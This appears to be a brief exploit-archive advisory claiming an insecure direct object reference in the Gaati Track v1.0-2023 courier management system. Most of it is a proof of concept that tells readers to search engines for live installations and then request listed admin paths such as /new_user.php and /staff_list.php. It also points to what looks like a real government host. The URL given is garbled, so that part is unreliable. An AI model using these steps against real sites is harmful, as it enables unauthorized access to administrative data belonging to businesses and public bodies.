Headline
Gaati Track 1.0-2023 Insecure Direct Object Reference
Gaati Track version 1.0-2023 suffers from an insecure direct object reference vulnerability.
====================================================================================================================================| # Title : Gaati track v1.0-2023 IDOR Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) || # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /new_user.php /branch_list.php /parcel_list.php /reports.php /sidebar.php /staff_list.php[+] https://www/127.0.0.1/ks50.karnataka.govin/sidebar.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================